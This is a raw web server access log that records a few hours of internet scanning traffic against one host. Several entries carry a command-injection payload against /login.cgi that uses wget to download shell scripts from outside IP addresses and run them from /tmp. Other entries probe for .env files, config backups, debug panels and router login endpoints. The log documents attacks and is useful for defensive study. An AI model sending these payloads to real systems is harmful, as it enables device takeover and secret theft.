109.205.213.5 - - [03/Jun/2023:01:37:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [03/Jun/2023:01:37:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.128.232.181 - - [03/Jun/2023:01:38:13 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
20.208.136.64 - - [03/Jun/2023:01:40:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.208.136.64 - - [03/Jun/2023:01:40:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
205.210.31.85 - - [03/Jun/2023:01:43:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
128.14.209.162 - - [03/Jun/2023:01:45:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.94.138.36 - - [03/Jun/2023:01:52:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.36 - - [03/Jun/2023:01:52:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.36 - - [03/Jun/2023:01:52:47 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.36 - - [03/Jun/2023:01:52:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
109.205.213.106 - - [03/Jun/2023:01:56:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
167.94.138.125 - - [03/Jun/2023:01:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.125 - - [03/Jun/2023:01:59:16 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.125 - - [03/Jun/2023:01:59:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
109.205.213.39 - - [03/Jun/2023:02:09:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.249 - - [03/Jun/2023:02:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.94.138.51 - - [03/Jun/2023:02:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.51 - - [03/Jun/2023:02:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [03/Jun/2023:02:20:35 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.51 - - [03/Jun/2023:02:20:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
170.64.176.111 - - [03/Jun/2023:02:21:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.64.176.111 - - [03/Jun/2023:02:21:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.64.176.111 - - [03/Jun/2023:02:21:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.176.111 - - [03/Jun/2023:02:21:24 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.176.111 - - [03/Jun/2023:02:21:24 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
170.64.176.111 - - [03/Jun/2023:02:21:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.64.176.111 - - [03/Jun/2023:02:21:26 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.176.111 - - [03/Jun/2023:02:21:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
170.64.176.111 - - [03/Jun/2023:02:21:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.176.111 - - [03/Jun/2023:02:21:27 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.176.111 - - [03/Jun/2023:02:21:28 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:15 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:15 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [03/Jun/2023:02:23:16 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:16 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:17 +0200] "POST /tool/view/phpinfo.view.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:17 +0200] "POST /wp-config.php-backup HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:18 +0200] "POST /%C0 HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:18 +0200] "POST /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:19 +0200] "POST /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:19 +0200] "POST /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:20 +0200] "POST /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:21 +0200] "POST /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:23:22 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:29 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:29 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [03/Jun/2023:02:24:29 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:30 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:30 +0200] "POST /tool/view/phpinfo.view.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:31 +0200] "POST /wp-config.php-backup HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:31 +0200] "POST /%C0 HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:32 +0200] "POST /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:32 +0200] "POST /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:33 +0200] "POST /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:33 +0200] "POST /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:34 +0200] "POST /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [03/Jun/2023:02:24:35 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.67.136.168 - - [03/Jun/2023:02:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
45.128.232.181 - - [03/Jun/2023:02:28:52 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
52.162.218.19 - - [03/Jun/2023:02:37:59 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:37:59 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:38:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:38:32 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:43:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:43:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:54:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:54:14 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.136.227.102 - - [03/Jun/2023:02:55:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:58:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:02:58:04 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.205.213.104 - - [03/Jun/2023:03:09:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
80.66.88.211 - - [03/Jun/2023:03:13:25 +0200] "\x03" 501 316 "-" "-"
45.128.232.181 - - [03/Jun/2023:03:13:27 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
186.121.250.247 - - [03/Jun/2023:03:18:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.37.160.223 - - [03/Jun/2023:03:23:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.52.213 - - [03/Jun/2023:03:29:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.52.213 - - [03/Jun/2023:03:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:05 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:05 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.223.52.213 - - [03/Jun/2023:03:29:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.52.213 - - [03/Jun/2023:03:29:06 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
159.223.52.213 - - [03/Jun/2023:03:29:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:07 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.52.213 - - [03/Jun/2023:03:29:08 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
221.163.212.177 - - [03/Jun/2023:03:29:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
221.163.212.177 - - [03/Jun/2023:03:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
205.210.31.54 - - [03/Jun/2023:03:30:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.236 - - [03/Jun/2023:03:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.107 - - [03/Jun/2023:03:43:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.235.24.253 - - [03/Jun/2023:03:47:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
218.158.56.141 - - [03/Jun/2023:03:47:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
35.203.210.81 - - [03/Jun/2023:03:50:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
91.204.250.66 - - [03/Jun/2023:03:51:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
198.235.24.36 - - [03/Jun/2023:03:51:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.240 - - [03/Jun/2023:03:51:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.43 - - [03/Jun/2023:03:57:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.227.254.8 - - [03/Jun/2023:04:02:20 +0200] "\x03" 501 316 "-" "-"
205.210.31.165 - - [03/Jun/2023:04:04:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.170 - - [03/Jun/2023:04:04:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.4 - - [03/Jun/2023:04:05:13 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [03/Jun/2023:04:11:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
51.159.164.227 - - [03/Jun/2023:04:17:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [03/Jun/2023:04:17:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
34.67.136.168 - - [03/Jun/2023:04:23:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
141.98.11.41 - - [03/Jun/2023:04:24:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.41 - - [03/Jun/2023:04:27:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.205.213.5 - - [03/Jun/2023:04:38:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
64.62.197.125 - - [03/Jun/2023:04:39:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
45.128.232.62 - - [03/Jun/2023:04:39:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
64.62.197.125 - - [03/Jun/2023:04:40:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
64.62.197.136 - - [03/Jun/2023:04:41:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
45.79.172.21 - - [03/Jun/2023:04:44:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.41 - - [03/Jun/2023:04:47:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.13 - - [03/Jun/2023:04:48:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.41 - - [03/Jun/2023:04:50:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.34 - - [03/Jun/2023:04:54:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.128.205 - - [03/Jun/2023:04:55:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.41 - - [03/Jun/2023:04:57:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.12 - - [03/Jun/2023:04:58:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.223 - - [03/Jun/2023:04:59:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.41 - - [03/Jun/2023:05:01:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.12 - - [03/Jun/2023:05:04:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.46 - - [03/Jun/2023:05:04:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.8 - - [03/Jun/2023:05:10:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
141.98.11.41 - - [03/Jun/2023:05:11:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.4 - - [03/Jun/2023:05:11:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.104 - - [03/Jun/2023:05:12:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.41 - - [03/Jun/2023:05:12:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.41 - - [03/Jun/2023:05:12:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
34.79.162.186 - - [03/Jun/2023:05:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
45.128.232.62 - - [03/Jun/2023:05:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
109.205.213.109 - - [03/Jun/2023:05:20:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
34.78.249.41 - - [03/Jun/2023:05:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
45.128.232.62 - - [03/Jun/2023:05:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
104.181.254.197 - - [03/Jun/2023:05:28:38 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 406 "-" "-"
109.205.213.109 - - [03/Jun/2023:05:29:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
34.140.248.32 - - [03/Jun/2023:05:29:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
34.79.162.186 - - [03/Jun/2023:05:29:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
35.195.93.98 - - [03/Jun/2023:05:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
